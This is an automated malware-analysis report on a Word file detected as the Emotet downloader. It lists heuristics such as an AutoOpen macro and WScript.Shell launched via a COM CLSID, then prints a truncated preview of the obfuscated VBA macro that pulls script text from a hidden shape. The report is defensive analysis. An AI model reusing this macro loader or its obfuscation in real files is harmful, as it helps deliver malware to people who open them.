MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample was detected as malicious by ClamAV with the signature Doc.Downloader.Emotet-6826435-0. Critical heuristics indicate the presence of VBA macros that instantiate the dangerous COM class WScript.Shell, a common technique for executing downloaded payloads. The AutoOpen macro is present, suggesting immediate execution upon opening the document. The obfuscated document body content appears to be a PowerShell downloader script.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6826435-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6826435-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7850 bytes |
SHA-256: 198ff1a7f3183d00545b507d062ba9b64c7272f6b3483c932ebbf994021f60f0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "PfAGmOG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case BjBzh
Case 60615032
PvkarRTl = CBool(OzBVak)
tDKszJVdC = 100082315
Case 302068318
XiYccA = Atn(zSSjOZlIU)
oYjRmIw = Atn(147723858 * CLng(108045589))
End Select
For Each FaHXcXAO In qXZVakcb
wSLBBFN = KBlZbGLNu * CDate(LuDqZWW * zPDIjKh) * azaEYBK / Sin(NwdMORNH) / LRjTFtof + 155451724 - 37270305 + Chr(326839218) + (BVbsBfOn * AJkSdatJ)
Next
On Error Resume Next
Select Case BdVVBic
Case 151480484
OvRjPLT = CBool(jhjFh)
ZiFvJdGn = 107893051
Case 78023260
NBGFiI = Atn(JGwEXHMj)
UjKoQ = Atn(132611570 * CLng(303976777))
End Select
For Each rviStUafF In CKMwFY
wamUGwjaZ = HGXzsHJO * CDate(aQPmVZSo * YrYal) * UtHbkwzsU / Sin(TZhVJDCh) / whhoRvn + 70417550 - 162543568 + Chr(10264865) + (NjUjdzzi * maXvEBA)
Next
Set CvcUsAGV = Shapes("qAUosho")
On Error Resume Next
Select Case aOcztUKwJ
Case 56016464
poPvnb = CBool(jiDOm)
MfSXr = 240462018
Case 300944904
KzFiTPSW = Atn(WzGlsG)
dVKaZEuM = Atn(186179359 * CLng(151877692))
End Select
For Each OBmEYOWf In KMTMrKQhO
UUYnuVaT = GDsGwd * CDate(UfRbr * MQUQBz) * OnMwwCRp / Sin(siwvHZ) / SGXjnqkP + 256991484 - 263095075 + Chr(34694560) + (ISdUc * zSqtKtLO)
Next
On Error Resume Next
Select Case lJlDFtl
Case 276439708
sYRHn = CBool(TbSboSa)
uZhKVD = 210624892
Case 43922874
qQmqzoo = Atn(YLMHoF)
iTXNjV = Atn(100805669 * CLng(57056009))
End Select
For Each wriXjQ In XlwaqAmW
dJQGOEFT = fBjSXEb * CDate(brGJR * IZoVqiVi) * AaFLwCzu / Sin(LBDOFFOt) / jYuQiMbIj + 168658881 - 231804082 + Chr(100111578) + (ABUfrRtc * izUzP)
Next
PBphCt = "" + jvOOV + dwHndCK + vYDzLI + GvYwd + CvcUsAGV.TextFrame.TextRange.Text + BwBhKYU + kzjKrz + QTpNobP + zjhiOBq
On Error Resume Next
Select Case aaTti
Case 33912553
nuwEEwDOt = CBool(YUFzfqNU)
qqtRBim = 237970973
Case 299508520
dQlwcOWVr = Atn(pMjipaN)
MvjGZKOI = Atn(303791183 * CLng(190103852))
End Select
For Each VRLKQQTmX In jJVVpii
PcbUD = wOWqahU * CDate(taVNdC * NVnqGd) * OkkckwiA / Sin(BOoLBt) / LpHPPuA + 181166776 - 34339666 + Chr(184662158) + (CGndwuMAm * wzWpt)
Next
On Error Resume Next
Select Case wRZBipOww
Case 129604512
kvVhuf = CBool(qULqlq)
nEcRGmhpi = 120077165
Case 166332984
qITFCB = Atn(lClkMRjwa)
mGjjLqkmj = Atn(293160600 * CLng(216917033))
End Select
For Each vRDIjpEX In IorEnB
PAZqGz = LsbiRiTVI * CDate(CHUjDi * sDbdRpiXo) * WjSqcw / Sin(rPHKmov) / fdCjhoLR + 232599555 - 328349600 + Chr(16930173) + (OuDzHcS * oqWZLuoob)
Next
On Error Resume Next
Select Case mkrcRbvtj
Case 282016637
DzWUcnYfA = CBool(jmpSoooi)
ZidciC = 55021785
Case 308905229
bwtLhKp = Atn(sBOwAbc)
FzBJcn = Atn(50183106 * CLng(97991111))
End Select
For Each ROZWoR In szDEtV
fdSvn = PYGAQc * CDate(Hlwoo * tQvPzEj) * GAXYTktVf / Sin(rUwDs) / YGLNM + 46504646 - 23177517 + Chr(98868470) + (PbnjOS * EWJYjcwrL)
Next
On Error Resume Next
Select Case NjFwKBCF
Case 301711016
jlFtiaJKj = CBool(LwvPDr)
wRzlUCk = 170421436
Case 186570219
hZvJakn = Atn(NJZGEi)
kJURl = Atn(274684494 * CLng(310447291))
End Select
For Each WEnwEP In UTGDbloB
LHDphFrM = cjsPIq * CDate(mFYFmojz * oGABCXw) * jGdmF / Sin(RMbdbfrF) / PWpfPv + 336441552 - 150723544 + Chr(161004475) + (LszqL * FnjjCN)
Next
On Error Resume Next
Se
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.